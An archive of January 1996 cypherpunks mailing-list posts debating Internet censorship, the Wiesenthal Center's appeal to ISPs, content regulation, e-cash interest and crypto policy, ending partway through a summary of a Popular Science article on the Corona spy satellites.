For the curious, Fresh Kills is NYC's main waste archive, the 
largest built structure in the US (a favorite of Japanese 
techno-tourists exceeding 256 Great Pyramids of Egypt) and 
still heaping.


Archeologists are indeed excavating selected spots, under 
grants made after probes revealed that decomposition was not 
occurring as expected. Newspapers and such were perfectly 
preserved after years of burial. Due to sophisticated 
engineering of the mountain to prevent dispersal, air and 
moisture could not enter to lubricate return to mother earth.


However, very profitable methane gas retrieval has been taking 
place for many years -- which may be a suitable metaphor for 
mining electronic archives.


Now, then, code for this glop? Construction debris can be 
illegally dumped at Fresh Kills with the proper 
building-code-compliant green handily hooked to the side of the 
dumpster for the guard.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Jan 1996 04:13:56 +0800
To: Pete Loshin <cypherpunks@toad.com>
Subject: RE: Net Control is Thought Control
Message-ID: <199601101954.LAA12507@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:34 1/10/96 -0500, Pete Loshin wrote:
>... [The] Hayes board of censors (the folks who felt that, during
>the 40's it was obscene to indicate that ANYONE, particularly
>married people, slept in the same bed together, with the result
>that bedroom scenes always had the couple sleeping in their own
>individual single beds).

Who apperently when thru the roof when they saw Casablanca.  It was real
obvious what Rick and Ilsa were doing in Paris, but there were no bedroom
scenes to cut.  A classic example of Art over Asshole.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 11 Jan 1996 04:40:03 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Don't type: "g**d t*m*s v*r*s"
In-Reply-To: <xty8w8m9LQbJ085yn@netcom.com>
Message-ID: <199601102015.MAA21474@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Just to set the record straight-- There's no mail->news
gateway at c2.org which works like that.. Mail to
alt.folklore.suburban@c2.org will give you a nice and ugly User
unknown error message.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 11 Jan 1996 01:44:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101633.IAA18047@infinity.c2.org>
Message-ID: <199601101722.MAA21848@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Citing ``the rapidly expanding presence of organized hate groups on the
> > Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
> > Center] on Tuesday began sending letters to hundreds of Internet access
> > providers and universities asking them to refuse to carry messages that
> > ``promote racism, anti-Semitism, mayhem and violence.''
> >
> > But Cooper said the ``unprecedented potential and scope of the Internet''
> > gives people ``incredible power to promote violence, threaten women,
> > denigrate minorities, promote homophobia and conspire against democracy.''

The SWC has a Web site http://www.wiesenthal.com, but there's no sign of the
letter on it right now. They do have a web-form survey on Hate on the
Internet, which I filled out for kicks. The CyberWatch section of their site
is the sort of place that says (and I quote) "Is there anything that can be
done?". <sigh>

Their "CyberWatch Perspective" http://www.wiesenthal.com/watch/wpers.htm
attacks anonymity on the net in a couple of places. Here are some relevant
excerpts:

- ----------------
"An incident in Texas highlights yet another advantage the information
superhighway gives bigots - anonymity and deniability. Witness the
recent equivalent of a hi-tech hate drive-by in Texas: Someone broke into
the electronic mail account of a professor and fired off a virulent
anti-black and anti-Semitic attack to 20,000 computer users in four states.
The attack was authored by the National Alliance, whose leader simply denied
sending the message. Its source was a convenient "anonymous I.D.""
[...]
"Hateful speech is, in general, "protected speech," but is there any reason
why, at a minimum, a recipient of any unsolicited and threatening message
from the superhighway should not have the right to know instantly the source
of the message?

Right now, the Internet, in effect, provides stealth technology for bigots,
child pornographers and the like. Accountability, not anonymity, should be
the operative principle."
- -----------------

No big surprise to see these folks come out against free speech in a new
medium. Too bad they're utterly blind to the lessons of the history they've
documented so well.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPP1jSnaAKQPVHDZAQEl4Qf+JUnC0XFqFvpHZ9YGlb5fW+EnsQ8gTJ4C
0for1k8zbCiR0iCL39E1a1I/SSD1LidjAPPuaaDHqORsf4ixlTIP59+Uxi5LK6GH
P9mwMViehs/OflmJrpC087UfRGsrd/KTnYeLRX4g773zsPCcChEjpj7LxYmLfZYV
1jsZBNwY+JoWEriPL9Hx/hMiJ11xY2f5RkeBp9rP6nKHvYQab365cKOcVA3DYt82
jG15jEw9p7Ub96gown1aJasr9GEj4DYkUzL74I6/0ewxqHVC8KEmdg5PdpxAJUkI
Lx2GLneBSWUqN1eGvXS2oW2PZ3A2kQ7P8Eoi7w3l7M94jsktELrfmA==
=AsJw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Jan 1996 02:03:02 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Bignum support added to XLISP 2.1h
In-Reply-To: <v02130502ad193fbd1b75@[199.125.128.5]>
Message-ID: <199601101736.MAA15287@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Wayner writes:
> Many cypherpunks might enjoy programming in XLISP 2.1h because the freely
> available implementation of LISP now offers support for BIGNUMS.

Almost all scheme implementations do the same, but scheme is
a lot cleaner than XLISP...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 11 Jan 1996 02:19:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: E-cash and Interest
In-Reply-To: <m0ta43a-00090DC@pacifier.com>
Message-ID: <Pine.OSF.3.91.960110123705.26842B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim:
	In some respects, it might actually be better. I recall attending 
an investment talk where the guru said that a dollar tax avoided was 
better than a dollar earned because it was less work! <g>

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



On Wed, 10 Jan 1996, jim bell wrote:

> At 08:20 AM 1/10/96 -0500, you wrote:
> >
> >I think that you have hit the nail on the head. Money could still 'earn' 
> >interest until it is spent. The 'bank' still has the 'real' money. In 
> >fact, it is an improvement over cash, in that you could still earn 
> >interest on the money on your hard drive.
> >Thanks for the clarification.
> 
> I think there is another way of looking at the ecash/interest situation:
> >From upside down, so to speak.  If the USE of Ecash avoids (legally or
> illegally) income or sales taxes, that constitutes an "interest," in an odd
> sort of way.  Not "real" interest, of course, but the next best thing.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Thu, 11 Jan 1996 05:01:11 +0800
To: cypherpunks@toad.com
Subject: Net Metaphor
Message-ID: <2.2.32.19960110204432.006a9008@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Given that most people have neither the time nor interest to understand how
the net really works, we need concise images that convey the truth. In
particular, we need to get across to the net.unhip masses the idea that the
net is not a "thing", not any single organization.

I've recently begun using this metaphor: the Internet is a society, composed
of all the systems that "speak" its computer protocols. In this it's like,
say, the society of all English-speakers. The English-language society
includes governments and businesses and churches and fraternal orders and
magazines and all sorts of things, but it isn't any of them. And obviously
there is nobody in charge of the English-language society as a whole - the
language itself evolves over time (and changes across space), and no
institution controls the whole show.

When I've brought that up, I've all but seen lightbulbs go on over people's
heads.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 02:12:16 +0800
To: cypherpunks@toad.com
Subject: Net Control is Thought Control
Message-ID: <2.2.32.19960110175223.006a6bcc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On CSPAN Friday morning a gentlemen who is, I take it, a lobbyist for TPC or
the Competitive Long Distance Coalition (TPCs) said that the Internet could
be regulated just like magazines, tv, or anything else.  I have long doubted
statements like this particularly since they come from people without
apparent experience on the Net.

I have long suggested that net control=thought control and will prove as
difficult in the modern world as the more conventional thought control
itself.  But why is net control just a form of thought control?

It is difficult for others to control our thoughts because they are
insubstantial, hidden, and under our control.  Small groups (family,
village, etc) have a better chance of influencing what we think but even
they are not totally successful.  Governments who wanted to engage in
thought control have usually set up government schools for this purpose with
mixed results.

Liberal societies (broadly defined) have loosened many of the traditional
controls on our thoughts exercised by our families and neighbors.  They have
tried to replace these controls with bureaucratic thought control systems
with limited success.  Only the totalitarian states have done much of a job
in this area but not enough (obviously) to save themselves from destruction.
There has been a general decline in the effectiveness of thought control
since the Industrial Revolution made (atomistic) individualism possible and
books cheap.

The Nets are the next step in this process.  Since they allow our thoughts
to easily, rapidly, and cheaply  leap from our minds to a world-wide
communications medium, our minds are in some sense extended worldwide.  It
becomes cheap and easy for anyone to publish their thoughts.  The dramatic
changes occasioned by the mechanical production of cheap pulp paper and
steam-driven printing presses in the 19th century will be as nothing
compared to effects of the speed and reach of Net "publishing."

In addition to expanding the scope of our thoughts, the Nets also give us
new powers of secret communication.  Modern encryption and anonymity
technology lets us both keep our thoughts secret and communicate them to
anyone else who is interested.  Quite an expansion of the capabilities of
"the thought in the brain."

Also, the Nets allow us to find others of our ilk (however small and deviate
that may be) who offer support to us in our thoughts.  This further reduces
the power of traditional thought controls exercised by our immediate
communities.  Since my immediate community has included Cypherpunks since
February 1993, I am less likely to be influenced "locally" on topics of
Cypherpunk interest.  The normal primate tendency to look to the "troop" for
guidance in what to think and do is sabotaged by our ability to find our own
reinforcing communities where ever we like.  So even less thought control is
possible.

As we users know and non-users will find out, the Nets are not "just another
medium" like books, magazines, and TV (just as those were not "just another
medium" in their day).  Control of the Nets will prove as difficult as the
control of thoughts themselves.

DCF










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 02:18:13 +0800
To: sameer <sameer@c2.org>
Subject: Re: When they came for the Jews...
Message-ID: <2.2.32.19960110180248.006b2198@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 1/10/96 -0800, sameer wrote:
>	Is there some way I can get a copy of this letter? Is it
>directed at specific ISPs or ISPs in general? An open response,
>publicized, to this sounds like something I could do. Publicity is
>fun.

It's not on http://www.wiesenthal.com/ yet.  Maybe I'll query.  They are
sending it to "hundreds" of ISPs.  Hitting the big services first (even
though they aren't really ISPs.)

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 02:47:12 +0800
To: cypherpunks@toad.com
Subject: Re: When they came for the Jews...
Message-ID: <2.2.32.19960110182140.006cee40@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 PM 1/10/96 -0500, Futplex wrote:
>No big surprise to see these folks come out against free speech in a new
>medium. Too bad they're utterly blind to the lessons of the history they've
>documented so well.
>
>Futplex <futplex@pseudonym.com>

Just part of the ongoing conflict between Anglo-Saxon values and European
values.  Runnymede vs Canossa.  TCP/IP vs X.25.  Some think that one should
bow to authority others think that authority should bow to them.

DCF

"Canossa -- In Germany, HENRY IV joined the antireform party and was
excommunicated (1076) by Pope Gregory VII. Losing support, Henry humbled
himself before Gregory at Canossa."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 11 Jan 1996 02:34:55 +0800
To: sameer@c2.org (sameer)
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101633.IAA18047@infinity.c2.org>
Message-ID: <199601101826.NAA04543@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The Wiesenthal center is very influential in Jewish circles.
Attacking them directly would probably be a bad idea, and create bad
associations for anonymity amongst Jews.  (I'll come back to this.)

	As always, the best answer to bad speech is more speech.  Ken
McVay, and his Nizkor project, (http://nizkor.almanac.bc.ca) have been
involved in fighting hate speech, holocaust revisionism, and the like
for long time through archiving the big lies that revisionists pump
out, documenting the bogosity of their footnotes, showing their
contradictions, etc.  Pointing out this, and other net resources
fighting anti-semitism is a much cleaner approach than attacking the
Wiesenthal center.

	Someone noted the police stopping skinheads in Oregon-- I'll
point out that there is a substantial difference between talking and
randomly beating the crap out of people.  The later is a fair basis
for action by police, although we may choose to question their
methodology.  There is also a difference between stopping skinheads
and stopping blacks, in that the skinheads decided to wear clothing
and tattoos that identify them as skinheads, and thus may more fairly
be asked to bear the consequences.

	Another approach might be to talk about the concept of
identity, and how dangerous mandating identity cards and papers can
be.  Jews in Germany were tracked down via phone records, bank
records, membership lists of organizations (a lesson probably noted by
the NAACP in refusing to give Alabama its membership rolls, leading to
a supreme court case upholding the right of anonymous association.)

	At the last CFP, Hugh Daniels was distributing buttons with a
bar code on the that said things like 'Is your Jew bit set?' and 'Is
your gay bit set?'

	Proposals to require everyone to have ID are a slippery slope
leading to a police state.  Jews of all people should know better.

sameer wrote:
| 
| 
| 	Is there some way I can get a copy of this letter? Is it
| directed at specific ISPs or ISPs in general? An open response,
| publicized, to this sounds like something I could do. Publicity is
| fun.

| > Citing ``the rapidly expanding presence of organized hate groups on the
| > Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
| > Center] on Tuesday began sending letters to hundreds of Internet access
| > providers and universities asking them to refuse to carry messages that
| > ``promote racism, anti-Semitism, mayhem and violence.'' 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 11 Jan 1996 03:02:59 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Net Control is Thought Control
Message-ID: <01BADF61.67341C00@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:

>On CSPAN Friday morning a gentlemen who is, I take it, a lobbyist for TPC or
>the Competitive Long Distance Coalition (TPCs) said that the Internet could
>be regulated just like magazines, tv, or anything else.  I have long doubted
>statements like this particularly since they come from people without
>apparent experience on the Net.
>
>[many other interesting comments deleted]

Magazines and TV (and books, newspapers, movies etc.) are _NOT_
regulated, at least not as to content.  These media are all
pretty much self-regulated.  The judgement of whether to print
the f-word in a newspaper is made by the editors and/or the
publishers--not the government.  The same goes for how much flesh
gets displayed on a television show, or in a movie, or on the 
cover of a magazine.

It is true that the TV and movie industry have subjected
themselves to self-censorship and "guidelines" to avoid having
the government step in and do it for them, however.  It may be
that this individual was speaking in favor of having the Internet
community police itself--which may mean he's in favor of an
updated Hayes board of censors (the folks who felt that, during
the 40's it was obscene to indicate that ANYONE, particularly
married people, slept in the same bed together, with the result
that bedroom scenes always had the couple sleeping in their own
individual single beds).

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 11 Jan 1996 03:14:05 +0800
To: "cypherpunks@toad.com>
Subject: Re: Book on Electronic Commerce
Message-ID: <01BADF61.69133C40@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


For the sake of completeness, I'll mention my book, too:


_Electronic Commerce: On-Line Ordering and Digital Money_

1995, 282 pages, $35.95 (includes CD ROM)

Charles River Media, Inc.

1 800 382-8505

ISBN # 1-886801-08-8


Excerpts (preface, Chapter 3, part of Chapter 6) 
are available at:

http://www.loshin.com/


-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 03:17:16 +0800
To: cypherpunks@toad.com
Subject: Re: When they came for the Jews...
Message-ID: <2.2.32.19960110184247.006bad88@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>But Cooper said the ``unprecedented potential and scope of the Internet''
>gives people ``incredible power to promote violence, 

As opposed, say, to the "82nd Airborne Division" or the "3rd Shock Army."

>threaten women,

Not to mention threaten men.  But I guess we don't deserve protection.

>denigrate minorities

What an incredibly racist statement.  Why should blackening (denigrating)
someone be bad?

>promote homophobia

Promote the fear of the same.  No risk of the Nets doing that.

>and conspire against democracy.'' 

Asked and answered.

DCF

"The 3rd Shock Army was the Red Army unit charged with charging through the
Fulda Gap to split the BRD if and when.  But 'if and when' never came."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 11 Jan 1996 04:31:18 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Net Control is Thought Control
In-Reply-To: <2.2.32.19960110175223.006a6bcc@panix.com>
Message-ID: <199601102011.OAA01630@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


[a lot of good stuff deleted]

> Control of the Nets will prove as difficult as the control of thoughts
> themselves. 

I agree with everything you said.

It seems to me that the simplest way to describe crypto anarchy is to say
that it's the observation that technological change is going to make
certain kinds of rules -- like our current tax and censorship laws --
nearly impossible to enforce.  The analysis makes sense to me, and I'm
inclined to believe that the crypto anarchy predictions will be borne out. 

Censorship is rapidly becoming technically infeasible.

That doesn't mean that attempts to censor the net won't be mounted, that 
they won't be damaging, and that people won't go to jail.  It just means 
that all of that ugliness will go down for nothing.

That's why it's important to try to educate people about the dynamics of
the net, and to try to persuade them that our analysis is accurate.  If
our government would simply look at things as they are with respect to
crypto, they would see that along with the inevitable loss of control 
there are a lot of opportunities and benefits, both politically and 
economically, to the new dynamic.

We ought to be trying to open up speech in countries like North Korea and 
Iraq with crypto tools.  We ought to make sure that American companies 
reap the benefits of the new financial tools that are coming down the 
pike.  And we ought to make sure that the software industry doesn't move 
overseas because our people aren't allowed to give their customers the 
crypto the market demands.

Our government's inability to accept reality on these issues is alreacy
costing business tens of billions of dollars each year, shipping jobs
overseas, and having a chilling effect on computer security resarch at
home and abroad (thereby exposing computer users to risks and damages they
might otherwise avoid).  Our own rights as citizens are being compromised,
and the arrival of free speech in other countries is being postponed
needlessly. 

For what?  So Sen. Exon and the NSA can tilt at windmills?

I wish the NSA would participate in these discussions publicly.  It
wouldn't even be necessary for them to do it as an institution.  Let's 
get some individuals from the NSA who agree with the agency's position 
out here to defend it.  Engage us in debate on the net.

Here's a challenge for the NSA:

Let's find a neutral third party, an academic or a journalist perhaps
(someone from CSPAN?), to moderate a newsgroup or a mail list so that
things won't degenerate into a shouting match.  We'll make a rule that
even posts that don't pass moderation will be published in a different
list, so that charges of biased moderation can be evaluated.

Tell us what you're trying to accomplish, why your goals are in the
nation's interest, and how your policy will accomplish those goals.  Then
let us challenge your arguments.  Let us explain what we're trying to
accomplish, why our goals are beneficial, and how our proposed policies
will accomplish those goals.  Then you guys can take your best shots at
us. 

Of course it's unthinkable that the NSA would accept such a challenge. 
But if you think about it, it shouldn't be.  These are important issues --
they affect our civil liberties and our wallets.  This is a democracy. 
And if the NSA believes in the strength of its position, it ought to have
enough confidence to defend it in public. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 04:23:02 +0800
To: Pete Loshin <cypherpunks@toad.com
Subject: RE: Net Control is Thought Control
Message-ID: <2.2.32.19960110200221.006aa430@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 PM 1/10/96 -0500, Pete Loshin wrote:
>Magazines and TV (and books, newspapers, movies etc.) are _NOT_
>regulated, at least not as to content.  These media are all
>pretty much self-regulated.  

Lots of content regulation in the US:

Libel, slander, indecency (radio and TV), obscenity, Federal Trade
Commission (advertizing controls), Food and Drug Administration (drug
'labeling' and info controls), booze and cigarette advertizing, EEOC
(controls on discriminatory advertizing), children's television
requirements, civil defense broadcast requirements, station identification
requirements, civil controls on advertizing foreign financial services (did
you know this was illegal?), civil liability for carrying 'hit man' ads,
etc.  I'd come up with more if I had more time.  I'll add more over the next
few days as I think of them.

Not to mention the numerous content controls in countries other than the US. 

The Nets will smash all of these content controls.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Thu, 11 Jan 1996 04:41:44 +0800
To: grimm@MIT.EDU
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101729.LAA01429@proust.suba.com>
Message-ID: <9601102024.AA27342@w20-575-60.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is interested, here is the URL for the Simon Wiesenthal
Center's cyberwatch (dedicated to fighting hatred and bigotry around
the globe):

http://www.wiesenthal.com/watch/index.html


-James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Thu, 11 Jan 1996 04:45:02 +0800
To: cypherpunks@toad.com
Subject: Is this true...
Message-ID: <2.2.32.19960110202813.006bb954@visi.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Being new to crypto subjects, I guess I'm pretty gullable about how much one
should use encryption in general.  I remember reading somewhere that it
would probably be best for the 'world as a whole' if everyone used
encryption whenever possible so that when you DO send encrypted messages
that actually contain information you want kept secret, it doesn't stick out
like a sore thumb.

To that end, I should imagine that once I have a person's pgp key, they may
well never see another cleartext message from me again!  Of course, now I'm
trying to figure out how to use the anonymous remailers and such.  Boy, this
is fun!

Of course, the fact that my government doesn't really care for the idea of
publicly available cryptography makes it even more enticing.

- --
Ted Garrett
Live Systems Integration


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPQhKc1+l8EKBK5FAQGkqgf7BN6GxJ5MHCAJZwfuS1JjNNQanT471L3O
0VEhkg0S0GG+827Swly3Bi+0BABcGcQatBSMGFRiecjIEzrRRa/6ME4tAr8qT/EW
DXVksWk4Bf6ax8uIF1uPf0uIOeQHOuCZwVnH7uHYCpaOMaMeTVobbyLeT30Gc5Ou
YhRIeyUvTazqlWqQaNSLSJX1no9Ph0R6WnDMUYGXof+VXgLw//jddcEfMYYn24hA
C8860mAbzke95iuACGcu6hzrr6njVaPMJHqyHb8kZwOjuESzDxZw0cYxt3VRPE72
NXqHzati0Rc/uzpx9FXV5lopRd0fFQUBOK75w0PA3Q5h/RQE6cvj+g==
=SQ81
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 11 Jan 1996 05:02:31 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: RE: Net Control is Thought Control
In-Reply-To: <2.2.32.19960110200221.006aa430@panix.com>
Message-ID: <Pine.SUN.3.91.960110152722.4338T-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, Duncan Frissell wrote:

> Lots of content regulation in the US:
> 
> Libel, slander, indecency (radio and TV), obscenity, Federal Trade
> Commission (advertizing controls), Food and Drug Administration (drug
> 'labeling' and info controls), booze and cigarette advertizing, EEOC
> (controls on discriminatory advertizing), children's television
> requirements, civil defense broadcast requirements, station identification
> requirements, civil controls on advertizing foreign financial services (did
> you know this was illegal?), civil liability for carrying 'hit man' ads,
> etc.  I'd come up with more if I had more time.  I'll add more over the next
> few days as I think of them.
<
> Not to mention the numerous content controls in countries other than the US. 
> 
> The Nets will smash all of these content controls.

So when WFMU starts broadcasting over the net, will I be able to play
smutty records on my show?

And when will I be able to add some kiddie-porn images to my web page?

   --D.

P.S.: Regarding limits on "freedom of speech" in the U.S., take a look
at the long list Tim May posted a few months back.  (I was scoffing at
Perry's claim that we had nearly complete freedom of speech in the
U.S., and then Tim responded with much more detail.)

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 11 Jan 1996 05:22:55 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: E-cash and Interest
In-Reply-To: <Pine.OSF.3.91.960110002053.21014A-100000@nic.wat.hookup.net>
Message-ID: <Pine.SV4.3.91.960110160732.3104C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> When you have your money in the bank, you are earning interest on the 
> Has this issue been addressed, or am I missing something?

     You are missing something.

   One can earn interest on money, or gold, or oil, or pork bellies, if
   one -  puts it at risk. Typically by lending it out.

 In our curent FDIC system, there is created  the myth, that bank 
interest is given without concomiitant risk.

The laws of economics are like the laws of physics. They apply, no matter 
what anyone says about anything. There is no free lunch - nor risk-free 
interest.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Thu, 11 Jan 1996 00:01:14 +0800
To: cypherpunks@toad.com
Subject: Re: Scenario: Digital Telephony Leads to GAK
In-Reply-To: <ad186156090210040315@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960110161343.727A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jan 1996, Timothy C. May wrote:

> We really need to be looking to what the nations of Europe are doing (as we
> have been of course, as the crypto laws of Europe have always been
> interesting to us, even if the machinations of the U.S. get most of the
> attention, for obvious reasons).

But the latest developments, like the December meeting in Paris
and another international meeting advertized for March -96, seem
to take place on a Worl Government basis (OECD). Obviously various
national governments understand that they can't really act on their
own. I don't think the EC will propose any actual laws on their
own but together with the US, Canada, Australia and possibly Japan.

Asgaard

(formerly writing under the pseudonym 'Mats' to confuse Alta Vista
 but I don't care any more...) 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 12 Jan 1996 02:22:01 +0800
To: cypherpunks@toad.com
Subject: archives
Message-ID: <199601102345.QAA00195@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


will whoevers maintaining the cpunk archives please check them, they
don't have anything since new years. And while you're at it, please
put in a mailto: link so that you can be informed directly that they're
down, or do I have to cc to postmaster and root?

Thanks

Don 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 11 Jan 1996 06:04:42 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101826.NAA04543@homeport.org>
Message-ID: <199601102152.QAA24188@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
> There is also a difference between stopping skinheads
> and stopping blacks, in that the skinheads decided to wear clothing
> and tattoos that identify them as skinheads, and thus may more fairly
> be asked to bear the consequences.

Sorry, but from where I stand there's nothing "wrong" with wearing clothing,
bearing tattoos, etc., any more than there's anything "wrong" with having a
particular level of skin pigmentation. When you decide that only clothing,
tattoos, etc. that display particular colors, emblems, words, etc. are
"wrong", then you are stifling free expression. 

This is very similar to the absurd flag burning "issue". (I would laugh, but 
both houses of the U.S. Congress came damn close to passing the proposed 
Constitutional amendment just a few weeks ago, although I thought the matter
was long dead.) When they decide that burning a piece of cloth _with a
particular emblem on it_ is "wrong", they rip up the First Amendment all over
again. I happen to think that going around burning pieces of cloth is a bad
idea from an environmental standpoint, but it's not clear that even that
should be illegal, let alone unconstitutional.

Futplex <futplex@pseudonym.com>
"Freedom...oh freedom...that's just some people talking" -Eagles

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPQ07SnaAKQPVHDZAQGnZQf+J+23cD39BAaGl1KZZJJTNu4DMPRxNLq8
E+E/f2MBV7BVlBrOBJqUL1uzyBDuJm9eI+jjcxXbBWZzL64ER7pOM82gdNHZcElh
xcgCswgX0FZ2iLcWN8cRAbaDq9QgilTvEzQjszLWVwTVQilZsncSLkNPdTGcSHwY
X5ku3cim7N4Z3aHYt+dpozoLkYCyJDHJOQ82jUioszXVY8fTyqxm3zurzzkNQpgp
9Fd9bJdp/LttIs6uJ1sH9cJVvhb44YfyOwIJJAaYXeRo3p2UOgmHvj0ZSEf9jHXk
qandwt8sAsStZ84RYZUWx66YitoRIhx/w2TQdLKqM54pQua9KMujeg==
=XyED
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 11 Jan 1996 12:00:29 +0800
To: cypherpunks@toad.com
Subject: Popular Science on US Spysats - Part 1
Message-ID: <Pine.BSD.3.91.960110173344.21390D@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  02 96 Popular Science runs a cover story, America's First Eyes 
  in Space.  It's by Stuart Brown.  It's about "a secret space 
  reconnaisance program known as Corona." 
 
  Brown reports that 
 
    Last year, the federal government declassified the program's 
    history and the more than 800,000 photographs that Corona 
    recorded.... 
 
    The development of the reconnaisance satellite was "the big- 
    gest advance in the history of the intelligence world," says 
    Jeffrey Richelson, a senior fellow at the National Security 
    Archive. 
 
 
  According to the article, the chronology of that and similar pro- 
  grams is: 
 
      1955   "Mid-air retrieval of spy cameras was originally de- 
             veloped during the secret Genetrix program authorized 
             by Eisenhower in 1955, which released 516 reconnai- 
